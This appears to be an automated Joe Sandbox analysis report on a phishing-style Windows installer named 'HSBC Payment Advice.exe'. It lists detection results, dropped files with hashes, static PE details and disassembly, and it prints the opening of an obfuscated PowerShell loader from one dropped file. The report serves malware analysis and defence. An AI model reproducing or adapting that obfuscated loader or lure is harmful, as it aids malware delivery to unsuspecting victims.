    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		111
    Process Injection    		LSASS Memory1
    Application Window Discovery    		Remote Desktop Protocol1
    Clipboard Data    		Junk DataExfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Shared Modules    		Logon Script (Windows)Logon Script (Windows)1
    Obfuscated Files or Information    		Security Account Manager2
    File and Directory Discovery    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    PowerShell    		Login HookLogin Hook1
    Software Packing    		NTDS14
    System Information Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    HSBC Payment Advice.exe11%ReversingLabs
    HSBC Payment Advice.exe22%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://pesterbdd.com/images/Pester.png10%VirustotalBrowse
    https://aka.ms/pscore6lB0%VirustotalBrowse
    https://nuget.org/nuget.exe0%VirustotalBrowse
    https://github.com/Pester/Pester40%VirustotalBrowse
    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
    https://contoso.com/0%VirustotalBrowse
    https://contoso.com/License0%VirustotalBrowse
    https://contoso.com/Icon0%VirustotalBrowse
    http://nuget.org/NuGet.exe0%VirustotalBrowse
    http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
    http://pesterbdd.com/images/Pester.png410%VirustotalBrowse
    https://github.com/Pester/Pester1%VirustotalBrowse
    http://www.apache.org/licenses/LICENSE-2.0.html40%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://pesterbdd.com/images/Pester.png4powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://github.com/Pester/Pester4powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.91916766120.0000000004C91000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://contoso.com/powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://contoso.com/Licensepowershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://contoso.com/Iconpowershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    http://www.quovadis.bm0powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmpfalse
      		unknown
      http://nsis.sf.net/NSIS_ErrorErrorHSBC Payment Advice.exefalseunknown
      https://ocsp.quovadisoffshore.com0powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.91916766120.0000000004C91000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpfalseunknown

        World Map of Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1533042
        Start date and time:2024-10-14 11:14:31 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 14m 5s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Run name:Suspected Instruction Hammering
        Number of analysed new started processes analysed:42
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:HSBC Payment Advice.exe
        Detection:MAL
        Classification:mal92.troj.evad.winEXE@4590/16@0/0
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 119
        • Number of non-executed functions: 37
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe
        • Execution Graph export aborted for target powershell.exe, PID 2088 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtWriteVirtualMemory calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        05:18:16API Interceptor1545x Sleep call for process: powershell.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:modified
        Size (bytes):14744
        Entropy (8bit):4.990428309401091
        Encrypted:false
        SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdB4NXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdB4NZiA
        MD5:A3F4A4CED5E4717EA59EEDAAA642F0CF
        SHA1:EB40B4929869C8C2A8866A0F06AE166F406FE493
        SHA-256:59B8E05483EA0D66C8F98CB27508791C4066743462559CE29BBF658DD88BEC0E
        SHA-512:804565218357E45BBFEE9661AF75E9941B54E1B6AA656DE02E57A0842BCA8E679F2250E004B4FF7705F4A22C65F9A3A48AF9614A851D8C062DF4DA3B99A67257
        Malicious:false
        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ubunmkm.axr.psm1

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode

        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ijl1o4cy.tcf.ps1

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode

        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldno01ek.mrr.ps1

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode

        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyvewuw1.ins.psm1

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode

        C:\Users\user\AppData\Local\Temp\nssD9C9.tmp

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):2346484
        Entropy (8bit):2.6764557765488286
        Encrypted:false
        SSDEEP:12288:3FaexgeSmAmf3jdR+2MmZOUnKHVw3h7UKfoum:V3HvjJMm1K1yh7UKwum
        MD5:01A87B57636D19615826E1CD27E75605
        SHA1:A15238BA9679A31B05144C293DFE18C55EC7C7AB
        SHA-256:C978FB1F2F3F24E29E81D035CF26CEC5824262F073FD1529509593D443E2CB4E
        SHA-512:57AB6B72768F3410DAC0E1B9844CF4C4F5F51EBB5CC3EA57A51B1435BC2F39DAAB692445C6E476237BF9D373E7C5C034B75FC69004A90DB9039441EB231159CF
        Malicious:false
        Preview:.$......,...................>...........P#.......$..........................................................Q?k.............................................................................................................................................................................G...f...........S...j...............................................................................................................................................'.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\typhaceae.lnk

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
        Category:dropped
        Size (bytes):898
        Entropy (8bit):3.2766262321715875
        Encrypted:false
        SSDEEP:12:8wl09sXUCr/ptYKp8WMhq6DrbMJKcsJL4/rNJkKAh4t2YCBTo8:8upp1haqsUgcB5HALJT
        MD5:87C111CAA4B128D591838A0A9BFC2427
        SHA1:A06D680CDFD30E1FFF94D6852F79FBD35355302B
        SHA-256:A42A874DCC24667D28C48CE4E400C45DFE81C5C5FB83103571BE8A989133639D
        SHA-512:2D5510FA697D3B7EBCD75AF39BCA568A8F82AFB9BEA40FE573CDC87AB00DCFFABF0423EF6F28ED34AAF4815252D688BB16A0913B991058BD9A6AE3B504BF8E2A
        Malicious:false
        Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....`.1...........seralbumen..F............................................s.e.r.a.l.b.u.m.e.n.....t.2...........Retslgeraad.Gun38.T............................................R.e.t.s.l.g.e.r.a.a.d...G.u.n.3.8... ...%.....\.....\.....\.s.e.r.a.l.b.u.m.e.n.\.R.e.t.s.l.g.e.r.a.a.d...G.u.n.3.8.;.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.a.a.s.e.l.a.t.t.e.r.e.n.\.V.r.d.i.r.e.d.u.k.t.i.o.n.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................

        C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\Candys.gen

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):184027
        Entropy (8bit):1.248418828542474
        Encrypted:false
        SSDEEP:768:pgAYiP+iKchwZNz9UiS03gnRU8cD1OJU26mly/WqcdX7rTZRgkuKL1Y2afh3ntqa:xMch0aUWkErXc928XJ3qRo
        MD5:0E5CFF01F43D9999324B60E3B3294CDD
        SHA1:69296289CAAD7B7F5C878BBA057108425B83276F
        SHA-256:BFCB9F5C3E66F7C32F7572679D9E59E3E300B5407D6B44D2B2EB3179283C8122
        SHA-512:7E302AEEEA08ABCBF565A804A3353AC173D2BA2F63CE805E2265EF97CBB789B78F8F723B442A9B54116966793E460B53C904396A13D9A3FF9876CB43A2235FB3
        Malicious:false
        Preview:....2...K...............C...............................................J.........D........W+...\........B............u......................................$.........................+...................r.......................*......................................................................?..........................................................h. B................................................................................]......................=...................................................................z..$......................*.......................................................................`..........t...........................u..6.....................~.......................o........|...........X.............................................................................................................U..............]................................3..................Q................................................A..................g...............

        C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\Kldningsstykker.glo

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):427169
        Entropy (8bit):1.2548989085548696
        Encrypted:false
        SSDEEP:1536:qk1x2Ro2V5D13zTZVhAk76+9/xT9sqt0W:J1xAoAr3xA1Sx9P
        MD5:E5089EDB79BFDF4A2B7A8891D24D00F0
        SHA1:6C4E7B6289161485A1DFBE5CEEA8771A3F8D94D3
        SHA-256:97111D973C70C28EFB47FC311968205CB23CDDC8F21491003FD7544778B7340D
        SHA-512:F38B9951B5368C5CA31F7D709006A44E94B5CE0C917249E98F1BC8982263DA552961CA6EBF8DC549D3C5216A886056AA301B5BDE011E5DB14D9513F5BAA6444A
        Malicious:false
        Preview:................&......(.........N..............."..|...............................J............................G............................#.................................H.....................K..............................................................-..............................I.........................`...........................................}.......................................2..........................................d...........................................................................................................f...............0u....................h.........9....................................."..............................................B..............................................7................................u.......$.........................................................\...........s...................t.............?.-....................................... ..............................................?........a..................."...

        C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\Noncontiguity.dsc

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):453470
        Entropy (8bit):1.2466668359396458
        Encrypted:false
        SSDEEP:1536:MKU4IGmVSWVDvmX9vPFBNYmRFd4XH7yW8/I4Ui4q+:I4l0vChPbPFd4ry7Wfq+
        MD5:B3949E0BC3C83D6E90EB1CCC7726740B
        SHA1:7A6F4C2F2C640BF8216E596AC80E0790D944476E
        SHA-256:484411D10FCDB12732B731B31D1D50FFE081066A98C2413F4AC984E4B7E57283
        SHA-512:03CD02BAC4908209C79E9E71F6F8931A56AF9AC55DA7503BD2E03EFCB024B88E011692A42B16B0F5B2C5EBD7A74385D084F8C4E5940D048D58E933D7400A41DB
        Malicious:false
        Preview:.T...................=....,.............-........................................s...................,.v.............F...............................................d.......................................................Z.....D........'......................Z...................................~....................................................E..................f.....................................................................{...................1.......~..................................................I..............................BZ..&................................>...............................t.......................................................................................................................................l...................................\....................W...................................K............................................Q.............................................................................................................

        C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\Ugyldige.per

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):312946
        Entropy (8bit):7.653634416909151
        Encrypted:false
        SSDEEP:6144:jrfObe+OMwoN4UsGC7gef6mBqmbm43lbH6UPjddH+2VrO6xvT:vFaexgeSmAmf3jdR+2Mm
        MD5:ED7B948861B8940807B3BC3DBE9FFEE3
        SHA1:A6EFE544D34A5EF4957FF441CE6F3F96AEC74614
        SHA-256:36D1FF1E3DDD5A503B213409932705ECB9BFA47C1CFB956FAD52E54CAA0EB19C
        SHA-512:C8FAB8B14D6C6978ADB222DD879F8E9EA533EDE1EA7A2A52A1AF05DCAE9C58A39BA378DB380A56DA7588DEC48108FABF4C7BB924DA285B0FF1C6DDC28A23045A
        Malicious:false
        Preview:........n......................555......v...............................###...--.........KK..y..............................U...................[[[.WWW.........H.$$....................MM....................................s..bbb..................pppp.....................................vvv......E......vvv.........,,..W...............88.........;;...........N........................................$$.............................z......r....%..........kkkk.........................................}.........HHH.55...n.m...B.....+..............lll..........................bb...w.C....y.....5...~..........o..WW.............v.......................;;;;.<.....MMMMMMM.............rrr...ii.......%%.......cc....i........1...e......K................................[[....P............??????............9....h....6..u............>>>>....hhhhh.............BBBB.....AA.............d............'....]............`................''...............................................@@.hh............N.......=.

        C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\demerara.bru

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:X11 SNF font data, MSB first
        Category:dropped
        Size (bytes):369472
        Entropy (8bit):1.253460385105366
        Encrypted:false
        SSDEEP:768:Vn/F3NyAuHt45PnXEjFaWZ1fIooQPU/37MlXVB+sjyPC7lU8+Esh1moJDleOh60j:VP9XyNc4t+T3ZBYiLyZ4RWwjBww
        MD5:23A9A227F832951F0D48E99468C2AB1D
        SHA1:152D6A33ED73D974A82F16494C19CEB994FEB2C7
        SHA-256:82F2D51505FF65C66402E44C5E477BBB0F1BACC5FE108CD544051AF2B85901B8
        SHA-512:37F7E92AF04D2F3769FE60995C7B7CA2F7B3E87F04BAAD48364D92B1D75E92FA50C929EA100FD82638DE8CFF19DBEA46199C341625ADD7F9FDD1814723313960
        Malicious:false
        Preview:..........................................................................X................$.L...................................................i.....................8......................................................................................L........................................|..................o...............o....L......................g........................................u......c.........2.......X........................c1.........................4.'..........&.l..................................a......................v........................N.........C................................................j...........................x...............................................p..........e........u...............H.....].................................................R......................k..........h.............................u..g.............................................................................................:.....................................

        C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\knustes.txt

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):538
        Entropy (8bit):4.238112058475284
        Encrypted:false
        SSDEEP:12:DwPAxW2qvFFJEEPZtOeImJK/g3757qa2ZMy3lqVI9V:DwPAQ2qv9ELzcKgoa2p1ga
        MD5:64C65B2685E171DD30270CEA73C90633
        SHA1:B1ECAE8EF2A1657F10EC62038AB02A0B1BF019CA
        SHA-256:6235C32E9A34F177C9E09B269FDB716C68F34FAD237ECA41B9720B44EF2B8FA1
        SHA-512:9461759D4830975EBB11C81513AB3C9C7D1E85A04D8C204B9CBE9FBD0D6BCE4DBFEFA6C59605C6F6E308326BDB7C492CE5D37596B899AE56989728AD0C3ABDFE
        Malicious:false
        Preview:gingili brailing regningsenheden rosin functionalises hestepensionerne zonesystems..centrumsdemokraternes pronationalist genbilledet idiologism.bulnet parastas fjeldrred fnblge videokassettens exordize resignment zinkkografierne disannex reordained onstand..arabise skrofuloses konvoluteredes advowsance cirkusteltes exfoliated prekantian..brugerantals secrets afsoegning metalraffinaderierne underskirt uvrgeligt humification palle uegennyttigere superabundance temporalt..fjendskab flyttedes deliriske tykmlet udstillingscentrene debut.

        C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\skarpsynede.usi

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):97718
        Entropy (8bit):1.2593766358472382
        Encrypted:false
        SSDEEP:768:hsqVrxXVypAWHKXZ2QTVmL5ls0kIYN/71ef+DGMl+:TrxAEj1efX
        MD5:2ACE5A50C1A1FAD5477C1A3A24DB47A4
        SHA1:4D830326E0FA772213DD803705A97051246F4837
        SHA-256:7FE6E8ECBBAA0A72AD4E4D2CA706B440DC5AE0EA216F4067B8544FEF84EC75CE
        SHA-512:DCFB8103FB1A13E1BD1D1E6FAF0DFC8263362EC90E103B522BF7AA23B218DF96BE54A032A21DD4A708212FEEE1207C52273C6EB2C81287811FF0EB1C836FE71E
        Malicious:false
        Preview:........................................-....................8.................n.....6............................................`...............................................................W.....................U.......G...............................................Y.....H..e.............O.........}.........................p.........&.......P.....................................................................................GG..........................~............................d.................................................... ...S....................................................E...............|.......................................................2..............................R...5.....................................I............................................._............ ......`.......................0.............................................................z....................................8......../..............................................U......s

        C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\slutningseffekts.roe

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):417254
        Entropy (8bit):1.2476145097876685
        Encrypted:false
        SSDEEP:1536:Wy0BNg/4UOfWwWNPwJAXJAA6u9ztfGShS:m8hOfWwW67u9zRS
        MD5:84F50E358CBC32D337514A9E53E83A26
        SHA1:0BD7514A20FE2B2B606442E7698A15F43BF164F5
        SHA-256:01634F194FDF6055C9E00F62E869A1AF6E619E0BB566733258A1B7EA03A8F012
        SHA-512:8F81558697FAA4981C700A39C6762F60619FF373612775CBAA23E34F2125AADF939EACD7A57BD84E59429487F16E039547A98F99B03CB7C94411FEB1B8065B2E
        Malicious:false
        Preview:............h.................................y.....5...........................................................F.....................................*...........................................................q.................D...................................................................7.........................w............^.........................S.............................................................W..........N................C..............L......................*...................D...............E...b.....W...................Q.....................................?.......................0.........................................{.................m.............................^......................}.........................v.............................................^..................0..............................*......................................................................................j...................._.......................................

        C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj

        Download File
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:ASCII text, with very long lines (4295), with CRLF, LF line terminators
        Category:dropped
        Size (bytes):74612
        Entropy (8bit):5.143193997878062
        Encrypted:false
        SSDEEP:1536:LjahcOrkEWFO5OntZ2zDE5r2QL0IA7BEyWNSEhz2CeAR72UX16Cu17Bv8:fahcOrgnKE5YV7VwqvmX072
        MD5:A493F57E18C597B0D7AB8C1ECBA32451
        SHA1:101A0DE3607767D8FC97DF39D97E449EF2694D7C
        SHA-256:56134D07525A53B1F8CD93C5E7D2FB09C0CA0A9B32C6FCAC55EECD7E53CBC123
        SHA-512:CE93394FCA0EA46D22C4095A9AD22533A1FDB198CA0A8E12B22A194843EE1A2409AAD03860B0F886E1ADC7AF6CF964B24E827120C28A7CED118FD719FE6C7D60
        Malicious:true
        Preview:$geste=$Sarum;..<#Vksthormon Begaud Salique #>..<#Skelsaars Monocled Vermilinguia Outspinned Fasciolet #>..<#Indekseres Pediculation Stemmetallet Papirindfring Skrupkedeligt #>..<#Egnsbank Byrd Spdbarnsplejes Necker Demonstratrer #>..<#Madopskrifternes Nordvestefter Bestykkende #>..<#angrier Ansgte Gastralgic Marlinspike Jyskes Saligprisning Unsoulfulness #>...$Hjhedens = @'. M rion.Spaceme$NeeldcaRAfkal,ne PythoncHfte seoInkslinnBoondoccSubtrakeBogfrinn FlerletViktualrHoarin,aEvakuert gifteri Fabriko Afri.nnDisdenolStramtegSalaamsa I,rtsatLitigateSrinterr VrisseoTaphu skguldsmeePerionyr Neur s2Outwind4Unfaili7 Appelm= V dium$ScarphsRfl,mredeWithh lcTekstmooNonutilnCirkussc etaltre uccedanuncondetPrinterr Suspena tredivtSlar umiPaed atoSupermonOvalityl an estg E uidia hesusnt GabrieeDisfriaeNonexi.r essertbTstrykkeChevrolrBa longtIso.olipNonlamipBrach,peUnmasterRedominn MonoteeA,affscsBeaverb;teoreti.AcutelyfJollyinuRegelrenSelvbetcenantiotUd knkniFagbgeroVitam rnKakaoen Tou,htSUnhand

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
        Entropy (8bit):7.6591953374855795
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:HSBC Payment Advice.exe
        File size:879'498 bytes
        MD5:b9138cef86a6c7324bec281bb7fa3e00
        SHA1:0d8d3ec170c54904dd6c7f87e6f8418810f8ecfb
        SHA256:b3eedff35f3202a6614d84582160de6b56c0bcd26f698c34b17d03c20d923c17
        SHA512:5e1100154757c3bd774c7206a3018d5b3a4ff18b79cdacd483b37e9bd2645927e1fd395851c49c4dfb6a8fcc2a557a2155af0cc98e3c1305b654dc68816d2e56
        SSDEEP:12288:UtQAVPMVLmfK04s8N74PsscOtJvLr8cciBja/WSQ9LJlf3NkcF3gIVlMh+NwQu9:1AmVuKQV/rpjaO1lf3oIvMh+NwQ6
        TLSH:FD15F18B6C52C89AE0D07F716CF5A19729377CA51234C1DFE9C7BE2C6EB225067C1298
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@

        File Icon

        Icon Hash:8b82989999951d11

        Static PE Info

        General

        Entrypoint:0x403358
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        DLL Characteristics:TERMINAL_SERVER_AWARE
        Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:e221f4f7d36469d53810a4b5f9fc8966

        Entrypoint Preview

        Instruction
        sub esp, 000002D4h
        push ebx
        push ebp
        push esi
        push edi
        push 00000020h
        xor ebp, ebp
        pop esi
        mov dword ptr [esp+14h], ebp
        mov dword ptr [esp+10h], 00409230h
        mov dword ptr [esp+1Ch], ebp
        call dword ptr [00407034h]
        push 00008001h
        call dword ptr [004070BCh]
        push ebp
        call dword ptr [004072ACh]
        push 00000008h
        mov dword ptr [00429298h], eax
        call 00007FAC04E823CCh
        mov dword ptr [004291E4h], eax
        push ebp
        lea eax, dword ptr [esp+34h]
        push 000002B4h
        push eax
        push ebp
        push 00420690h
        call dword ptr [0040717Ch]
        push 0040937Ch
        push 004281E0h
        call 00007FAC04E82037h
        call dword ptr [00407134h]
        mov ebx, 00434000h
        push eax
        push ebx
        call 00007FAC04E82025h
        push ebp
        call dword ptr [0040710Ch]
        cmp word ptr [00434000h], 0022h
